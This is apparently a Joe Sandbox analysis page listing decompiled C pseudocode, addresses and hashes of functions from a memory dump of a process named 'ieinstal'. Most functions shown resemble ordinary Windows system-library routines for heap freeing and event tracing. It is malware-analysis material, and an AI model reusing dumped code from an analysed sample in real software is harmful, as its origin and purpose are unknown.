                                                            0x1ecb373d
                                                            0x1ecb3740
                                                            0x00000000
                                                            0x1ecb3746
                                                            0x1ecb3746
                                                            0x1ecb3749
                                                            0x00000000
                                                            0x1ecb374f
                                                            0x1ecb374f
                                                            0x1ecb3751
                                                            0x1ecb3757
                                                            0x1ecb3759
                                                            0x1ecb375c
                                                            0x1ecb375c
                                                            0x1ecb375e
                                                            0x1ecb375e
                                                            0x1ecb3761
                                                            0x1ecb3764
                                                            0x00000000
                                                            0x00000000
                                                            0x1ecb3766
                                                            0x1ecb3768
                                                            0x1ecb37a3
                                                            0x1ecb37a3
                                                            0x1ecb37a5
                                                            0x1ecb37a7
                                                            0x1ecb37ad
                                                            0x1ecb37b0
                                                            0x1ecb37b2
                                                            0x1ecb37bc
                                                            0x1ecb37c2
                                                            0x1ecb37c2
                                                            0x1ecb37b2
                                                            0x1ec59187
                                                            0x1ec59187
                                                            0x1ec5918a
                                                            0x1ec5918d
                                                            0x1ec5918f
                                                            0x1ec59192
                                                            0x1ec59195
                                                            0x00000000
                                                            0x1ec59195
                                                            0x00000000
                                                            0x1ecb376a
                                                            0x1ecb376a
                                                            0x1ecb376a
                                                            0x1ecb376c
                                                            0x1ecb376c
                                                            0x1ecb376f
                                                            0x1ecb3775
                                                            0x00000000
                                                            0x00000000
                                                            0x1ecb3777
                                                            0x1ecb3779
                                                            0x1ecb3782
                                                            0x1ecb3787
                                                            0x1ecb3789
                                                            0x1ecb3790
                                                            0x1ecb3790
                                                            0x1ecb378b
                                                            0x1ecb378b
                                                            0x1ecb378b
                                                            0x1ecb3792
                                                            0x1ecb3795
                                                            0x00000000
                                                            0x1ecb3795
                                                            0x00000000
                                                            0x1ecb3779
                                                            0x1ecb3798
                                                            0x00000000
                                                            0x1ecb3798
                                                            0x00000000
                                                            0x1ecb3768
                                                            0x1ecb379b
                                                            0x1ecb379b
                                                            0x1ecb3751
                                                            0x1ecb3749
                                                            0x00000000
                                                            0x1ecb3740
                                                            0x1ec591a0
                                                            0x1ec591a3
                                                            0x1ec591a9
                                                            0x1ec591b0
                                                            0x00000000
                                                            0x1ec591b0
                                                            0x1ec59187
                                                            0x1ec591b4
                                                            0x1ec591b4
                                                            0x1ec591bb
                                                            0x1ec591c0
                                                            0x1ec591c5
                                                            0x1ec591c7
                                                            0x1ecb37da
                                                            0x1ec591cd
                                                            0x1ec591cd
                                                            0x1ec591cd
                                                            0x1ec591d2
                                                            0x1ec591d5
                                                            0x1ec59239
                                                            0x1ec59239
                                                            0x1ec591d7
                                                            0x1ec591db
                                                            0x1ec591e1
                                                            0x1ec591e7
                                                            0x1ec591fd
                                                            0x1ec59203
                                                            0x1ec5921e
                                                            0x1ec59223
                                                            0x00000000
                                                            0x1ec59205
                                                            0x1ec59205
                                                            0x1ec59208
                                                            0x1ec5920c
                                                            0x1ec59214
                                                            0x1ec59214
                                                            0x1ec5920c
                                                            0x1ec591e9
                                                            0x1ec591e9
                                                            0x1ec591ee
                                                            0x1ec591f3
                                                            0x1ec591f3
                                                            0x1ec591f3
                                                            0x1ec591e7
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x1ec59134
                                                            0x1ec59125
                                                            0x1ec5911d
                                                            0x1ec5914e
                                                            0x1ec590d1
                                                            0x1ec590d1
                                                            0x1ec590d3
                                                            0x1ec590d6
                                                            0x1ec590d8
                                                            0x00000000
                                                            0x1ec590d8
                                                            0x1ec590cf

                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a051879f1a15245d6b36bd626adfd34aa2445ac098fb34e3275332665954eab1
                                                            • Instruction ID: b29af5f08059f0e900c80f753499ea64eeea338986a4d0c442178af5b839b614
                                                            • Opcode Fuzzy Hash: a051879f1a15245d6b36bd626adfd34aa2445ac098fb34e3275332665954eab1
                                                            • Instruction Fuzzy Hash: 0F0128B3A113518FC3048F05CC80B16B7FAEF8A720F2946A6E1218BB95C770DC41CB94
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1ECEC450 Relevance: .1, Instructions: 53COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 46%
                                                            			E1ECEC450(intOrPtr* _a4) {
				signed char _t25;
				intOrPtr* _t26;
				intOrPtr* _t27;

				_t26 = _a4;
				_t25 =  *(_t26 + 0x10);
				if((_t25 & 0x00000003) != 1) {
					_push(0);
					_push(0);
					_push(0);
					_push( *((intOrPtr*)(_t26 + 8)));
					_push(0);
					_push( *_t26);
					E1EC99910();
					_t25 =  *(_t26 + 0x10);
				}
				if((_t25 & 0x00000001) != 0) {
					_push(4);
					_t7 = _t26 + 4; // 0x4
					_t27 = _t7;
					_push(_t27);
					_push(5);
					_push(0xfffffffe);
					E1EC995B0();
					if( *_t27 != 0) {
						_push( *_t27);
						E1EC995D0();
					}
				}
				_t8 = _t26 + 0x14; // 0x14
				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
					L1EC777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
				}
				_push( *_t26);
				E1EC995D0();
				return L1EC777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
			}






                                                            0x1ecec458
                                                            0x1ecec45d
                                                            0x1ecec466
                                                            0x1ecec468
                                                            0x1ecec469
                                                            0x1ecec46a
                                                            0x1ecec46b
                                                            0x1ecec46e
                                                            0x1ecec46f
                                                            0x1ecec471
                                                            0x1ecec476
                                                            0x1ecec476
                                                            0x1ecec47c
                                                            0x1ecec47e
                                                            0x1ecec480
                                                            0x1ecec480
                                                            0x1ecec483
                                                            0x1ecec484
                                                            0x1ecec486
                                                            0x1ecec488
                                                            0x1ecec48f
                                                            0x1ecec491
                                                            0x1ecec493
                                                            0x1ecec493
                                                            0x1ecec48f
                                                            0x1ecec498
                                                            0x1ecec49e
                                                            0x1ecec4ad
                                                            0x1ecec4ad
                                                            0x1ecec4b2
                                                            0x1ecec4b4
                                                            0x1ecec4cd

                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                                            • Instruction ID: f2ec5318d2f4888f11f22a4cca6ca2c0037328d3613ada287d7f3474a13c92a9
                                                            • Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                                            • Instruction Fuzzy Hash: 0B018C7614068ABFD7159F65CC90EA2BB7EFB54391F014A25F61442960CB22BCA1DAA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1ED24015 Relevance: .0, Instructions: 49COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 86%
                                                            			E1ED24015(signed int __eax, signed int __ecx) {
				void* __ebx;
				void* __edi;
				signed char _t10;
				signed int _t28;

				_push(__ecx);
				_t28 = __ecx;
				asm("lock xadd [edi+0x24], eax");
				_t10 = (__eax | 0xffffffff) - 1;
				if(_t10 == 0) {
					_t1 = _t28 + 0x1c; // 0x1e
					E1EC72280(_t10, _t1);
					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
					E1EC72280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x1ed486ac);
					E1EC5F900(0x1ed486d4, _t28);
					E1EC6FFB0(0x1ed486ac, _t28, 0x1ed486ac);
					 *((intOrPtr*)(_t28 + 0x20)) = 0;
					E1EC6FFB0(0, _t28, _t1);
					_t18 =  *((intOrPtr*)(_t28 + 0x94));
					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
						L1EC777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
					}
					_t10 = L1EC777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
				}
				return _t10;
			}







                                                            0x1ed2401a
                                                            0x1ed2401e
                                                            0x1ed24023
                                                            0x1ed24028
                                                            0x1ed24029
                                                            0x1ed2402b
                                                            0x1ed2402f
                                                            0x1ed24043
                                                            0x1ed24046
                                                            0x1ed24051
                                                            0x1ed24057
                                                            0x1ed2405f
                                                            0x1ed24062
                                                            0x1ed24067
                                                            0x1ed2406f
                                                            0x1ed2407c
                                                            0x1ed2407c
                                                            0x1ed2408c
                                                            0x1ed2408c
                                                            0x1ed24097

                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: df400088221bcc0acd9937a7540c334c0f13d7a7be3311a4e1c87a45520a2f4b
                                                            • Instruction ID: 2560f38a201893d17123657a5c0a56bbd4a6feeda3118e1318f2913593c4d06e
                                                            • Opcode Fuzzy Hash: df400088221bcc0acd9937a7540c334c0f13d7a7be3311a4e1c87a45520a2f4b
                                                            • Instruction Fuzzy Hash: E2018F766019C6BFC2559F69CE80E17B7EDEF49A60B000725B50887A11DF24FC51C6E4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1ED1138A Relevance: .0, Instructions: 48COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 61%
                                                            			E1ED1138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x1ed4d360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E1EC9FA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1033;
				if(E1EC77D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E1EC9B640(E1EC99AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

















                                                            0x1ed1138a
                                                            0x1ed1138a
                                                            0x1ed11399
                                                            0x1ed113a3
                                                            0x1ed113a8
                                                            0x1ed113aa
                                                            0x1ed113b5
                                                            0x1ed113bb
                                                            0x1ed113c3
                                                            0x1ed113c6
                                                            0x1ed113c9
                                                            0x1ed113d4
                                                            0x1ed113e6
                                                            0x1ed113d6
                                                            0x1ed113df
                                                            0x1ed113df
                                                            0x1ed113f1
                                                            0x1ed113f2
                                                            0x1ed113f4
                                                            0x1ed113f9
                                                            0x1ed1140e

                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7b299b15a60fe69872959fe4c450206487f1b2574652cf551a277f916021b0a9
                                                            • Instruction ID: eef6b29a04421ba5172f9a2b3a2ff788067bb87035ed95d11975174734d51037
                                                            • Opcode Fuzzy Hash: 7b299b15a60fe69872959fe4c450206487f1b2574652cf551a277f916021b0a9
                                                            • Instruction Fuzzy Hash: CB019275A01258AFCB04DFA9D841EAEB7B8EF44700F004156F900EB280DB70EA01C794
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1ED114FB Relevance: .0, Instructions: 48COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 61%
                                                            			E1ED114FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x1ed4d360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E1EC9FA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1034;
				if(E1EC77D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E1EC9B640(E1EC99AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

















                                                            0x1ed114fb
                                                            0x1ed114fb
                                                            0x1ed1150a
                                                            0x1ed11514
                                                            0x1ed11519
                                                            0x1ed1151b
                                                            0x1ed11526
                                                            0x1ed1152c
                                                            0x1ed11534
                                                            0x1ed11537
                                                            0x1ed1153a
                                                            0x1ed11545
                                                            0x1ed11557
                                                            0x1ed11547
                                                            0x1ed11550
                                                            0x1ed11550
                                                            0x1ed11562
                                                            0x1ed11563
                                                            0x1ed11565
                                                            0x1ed1156a
                                                            0x1ed1157f

                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b77816d9e47703d43c149bb0600c1210a4f00949dca724b2eee78125d2fe9118
                                                            • Instruction ID: 6de9a83161c6631485146d06f5fc2b0e82183c662f030857c744878d28c231fe
                                                            • Opcode Fuzzy Hash: b77816d9e47703d43c149bb0600c1210a4f00949dca724b2eee78125d2fe9118
                                                            • Instruction Fuzzy Hash: 5B019E75A00298AFDB04DFA9D845FAEBBB8EF44700F404166F904EB280DA70EA00CB94
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1EC558EC Relevance: .0, Instructions: 47COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 91%
                                                            			E1EC558EC(intOrPtr __ecx) {
				signed int _v8;
				char _v28;
				char _v44;
				char _v76;
				void* __edi;
				void* __esi;
				intOrPtr _t10;
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_v8 =  *0x1ed4d360 ^ _t29;
				_t10 =  *[fs:0x30];
				_t27 = __ecx;
				if(_t10 == 0) {
					L6:
					_t28 = 0x1ec35c80;
				} else {
					_t16 =  *((intOrPtr*)(_t10 + 0x10));
					if(_t16 == 0) {
						goto L6;
					} else {
						_t28 =  *((intOrPtr*)(_t16 + 0x3c));
					}
				}
				if(E1EC55943() != 0 &&  *0x1ed45320 > 5) {
					E1ECD7B5E( &_v44, _t27);
					_t22 =  &_v28;
					E1ECD7B5E( &_v28, _t28);
					_t11 = E1ECD7B9C(0x1ed45320, 0x1ec3bf15,  &_v28, _t22, 4,  &_v76);
				}
				return E1EC9B640(_t11, _t17, _v8 ^ _t29, 0x1ec3bf15, _t27, _t28);
			}















                                                            0x1ec558fb
                                                            0x1ec558fe
                                                            0x1ec55906
                                                            0x1ec5590a
                                                            0x1ec5593c
                                                            0x1ec5593c
                                                            0x1ec5590c
                                                            0x1ec5590c
                                                            0x1ec55911
                                                            0x00000000
                                                            0x1ec55913
                                                            0x1ec55913
                                                            0x1ec55913
                                                            0x1ec55911
                                                            0x1ec5591d
                                                            0x1ecb1035
                                                            0x1ecb103c
                                                            0x1ecb103f
                                                            0x1ecb1056
                                                            0x1ecb1056
                                                            0x1ec5593b

                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 44cf8650f100a3c0803fd902c6cf2c75e68ee9858a9eebfae4e7e3c003cb644e
                                                            • Instruction ID: 38f90cd7884ed6cc2ef18731c7b9204c40a594b45553da3ef732b977adcc89c7
                                                            • Opcode Fuzzy Hash: 44cf8650f100a3c0803fd902c6cf2c75e68ee9858a9eebfae4e7e3c003cb644e
                                                            • Instruction Fuzzy Hash: 1701DF36B00244EBC704CF2ADC149AE73A9AF94530BA50269E805D7744DF30ED0687D8
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1ED0FEC0 Relevance: .0, Instructions: 46COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 59%
                                                            			E1ED0FEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x1ed4d360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E1EC9FA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x266;
				if(E1EC77D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E1EC9B640(E1EC99AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                                                            0x1ed0fec0
                                                            0x1ed0fec0
                                                            0x1ed0fecf
                                                            0x1ed0fed9
                                                            0x1ed0fede
                                                            0x1ed0fee0
                                                            0x1ed0feeb
                                                            0x1ed0fef3
                                                            0x1ed0fef6
                                                            0x1ed0fef9
                                                            0x1ed0ff04
                                                            0x1ed0ff16
                                                            0x1ed0ff06
                                                            0x1ed0ff0f
                                                            0x1ed0ff0f
                                                            0x1ed0ff21
                                                            0x1ed0ff22
                                                            0x1ed0ff24
                                                            0x1ed0ff29
                                                            0x1ed0ff3e

                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 01f46c61d9f633530f47c4c4fbbed32fb55435d1c6cec4e00e41f396ddc7422b
                                                            • Instruction ID: 69369928b80631d20378bf5642e769b6f09efbf4c9d6b724eb126b6764cf97e7
                                                            • Opcode Fuzzy Hash: 01f46c61d9f633530f47c4c4fbbed32fb55435d1c6cec4e00e41f396ddc7422b
                                                            • Instruction Fuzzy Hash: 15018F75E00258ABCB14DFA9D845FAFBBB8EF44700F444166F900EB280EE70EA51C798
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1ED0FE3F Relevance: .0, Instructions: 46COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 59%
                                                            			E1ED0FE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x1ed4d360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E1EC9FA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x267;
				if(E1EC77D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E1EC9B640(E1EC99AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                                                            0x1ed0fe3f
                                                            0x1ed0fe3f
                                                            0x1ed0fe4e
                                                            0x1ed0fe58
                                                            0x1ed0fe5d
                                                            0x1ed0fe5f
                                                            0x1ed0fe6a
                                                            0x1ed0fe72
                                                            0x1ed0fe75
                                                            0x1ed0fe78
                                                            0x1ed0fe83
                                                            0x1ed0fe95
                                                            0x1ed0fe85
                                                            0x1ed0fe8e
                                                            0x1ed0fe8e
                                                            0x1ed0fea0
                                                            0x1ed0fea1
                                                            0x1ed0fea3
                                                            0x1ed0fea8
                                                            0x1ed0febd

                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: fceede7ee7452b44e6bbb151f6163775b7d1bb1f7e7ff966e100e46f96bbce69
                                                            • Instruction ID: 0aca5ee01ce4be884d32322a427e3f7ffe878a92be19c7b21bd0a666c91be6b1
                                                            • Opcode Fuzzy Hash: fceede7ee7452b44e6bbb151f6163775b7d1bb1f7e7ff966e100e46f96bbce69
                                                            • Instruction Fuzzy Hash: DC018F75E04258ABCB14DFA9D845FAEBBB8EF44700F044566F900AB381DE74EA51C7A8
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1ED21074 Relevance: .0, Instructions: 46COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E1ED21074(intOrPtr __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
				char _v8;
				void* _v11;
				unsigned int _v12;
				void* _v15;
				void* __esi;
				void* __ebp;
				char* _t16;
				signed int* _t35;

				_t22 = __ebx;
				_t35 = __ecx;
				_v8 = __edx;
				_t13 =  !( *__ecx) + 1;
				_v12 =  !( *__ecx) + 1;
				if(_a4 != 0) {
					E1ED2165E(__ebx, 0x1ed48ae4, (__edx -  *0x1ed48b04 >> 0x14) + (__edx -  *0x1ed48b04 >> 0x14), __edi, __ecx, (__edx -  *0x1ed48b04 >> 0x14) + (__edx -  *0x1ed48b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
				}
				E1ED1AFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
				if(E1EC77D50() == 0) {
					_t16 = 0x7ffe0388;
				} else {
					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				if( *_t16 != 0) {
					_t16 = E1ED0FE3F(_t22, _t35, _v8, _v12);
				}
				return _t16;
			}











                                                            0x1ed21074
                                                            0x1ed21080
                                                            0x1ed21082
                                                            0x1ed2108a
                                                            0x1ed2108f
                                                            0x1ed21093
                                                            0x1ed210ab
                                                            0x1ed210ab
                                                            0x1ed210c3
                                                            0x1ed210cf
                                                            0x1ed210e1
                                                            0x1ed210d1
                                                            0x1ed210da
                                                            0x1ed210da
                                                            0x1ed210e9
                                                            0x1ed210f5
                                                            0x1ed210f5
                                                            0x1ed210fe

                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d5cbbc78d6e439295ff03607231527be4f48f939274f97109172b0bc18fcc48c
                                                            • Instruction ID: a2180116349a3e7dfdaded8f26ccffe4f069f5b042c04c65b867cfadf8c5a8dd
                                                            • Opcode Fuzzy Hash: d5cbbc78d6e439295ff03607231527be4f48f939274f97109172b0bc18fcc48c
                                                            • Instruction Fuzzy Hash: 3C01247A504782AFC700DF79C940B1AB7E6BB84254F40CB29F88587691EF30E940CBA2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1EC6B02A Relevance: .0, Instructions: 46COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E1EC6B02A(intOrPtr __ecx, signed short* __edx, short _a4) {
				signed char _t11;
				signed char* _t12;
				intOrPtr _t24;
				signed short* _t25;

				_t25 = __edx;
				_t24 = __ecx;
				_t11 = ( *[fs:0x30])[0x50];
				if(_t11 != 0) {
					if( *_t11 == 0) {
						goto L1;
					}
					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
					L2:
					if( *_t12 != 0) {
						_t12 =  *[fs:0x30];
						if((_t12[0x240] & 0x00000004) == 0) {
							goto L3;
						}
						if(E1EC77D50() == 0) {
							_t12 = 0x7ffe0385;
						} else {
							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t12 & 0x00000020) == 0) {
							goto L3;
						}
						return E1ECD7016(_a4, _t24, 0, 0, _t25, 0);
					}
					L3:
					return _t12;
				}
				L1:
				_t12 = 0x7ffe0384;
				goto L2;
			}







                                                            0x1ec6b037
                                                            0x1ec6b039
                                                            0x1ec6b03b
                                                            0x1ec6b040
                                                            0x1ecba60e
                                                            0x00000000
                                                            0x00000000
                                                            0x1ecba61d
                                                            0x1ec6b04b
                                                            0x1ec6b04e
                                                            0x1ecba627
                                                            0x1ecba634
                                                            0x00000000
                                                            0x00000000
                                                            0x1ecba641
                                                            0x1ecba653
                                                            0x1ecba643
                                                            0x1ecba64c
                                                            0x1ecba64c
                                                            0x1ecba65b
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x1ecba66c
                                                            0x1ec6b057
                                                            0x1ec6b057
                                                            0x1ec6b057
                                                            0x1ec6b046
                                                            0x1ec6b046
                                                            0x00000000

                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
